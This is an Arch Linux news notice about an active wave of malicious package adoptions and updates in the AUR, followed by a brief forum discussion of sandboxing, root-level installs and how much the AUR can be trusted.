Arch Linux - News: Active AUR malicious packages incident
archlinux.org

We are currently experiencing a high volume of malicious package adoptions and updates in the Arch User Repository.

We are actively working to track down existing malicious commits and attempting to prevent additional malicious commits from being pushed. While this is happening, and while we work to create a more permanent solution, users may see issues with the following:

  • Creating new accounts on the AUR
  • Pushing package updates
  • Adopting or creating new packages

We continue to encourage all users of AUR packages to review all PKGBUILD and install script changes when updating, especially during this time. If you notice suspicious commits to a package that you use, please reach out to Arch staff via the aur-general mailing list with more information.

  • TheModerateTankie [any]@hexbear.netEnglish
    2·
    3 天前

    This is one of the reasons why I prefer the user/sandbox model of something like the “atomic” distros or flatpak, despite some occasional annoyances with privileges. If you use a traditional package manager everything in the repository gets installed as root and has access to everything on your computer. Most of the desktop software people use probably doesn’t need to be installed at the root level. Generally not a problem when the software is reviewed and maintained by a competent distro, aside from cases like XV utils, but adding repositories or using something like the AUR elevates the risk. At the very least it seems like AUR should be sandboxed and/or installed as at the user level only by default. I dunno, maybe this new exploit would still be a problem if that were the case, but it just like an obviously flawed paradigm people have just accepted because linux malware has been relatively rare compared to windows, and adding security layers are a hassle.

    • AssortedBiscuits [they/them]@hexbear.netOPEnglish
      2·
      3 天前

      It’s definitely exciting times. I don’t like how the AUR is toted by the Arch community as something that makes Arch stand out compared with other distros until something like this happens then it’s “Well, you should only use the AUR if you know what you’re doing. Arch is explicit about how the AUR hasn’t been vetted, so you can’t pin this on Arch. Caveat emptor.”

      • TheModerateTankie [any]@hexbear.netEnglish
        2·
        3 天前

        It’s wierd that it’s so heavily promoted to new users these days. “Just read all the notes before you update, bro” on a system that constantly updates…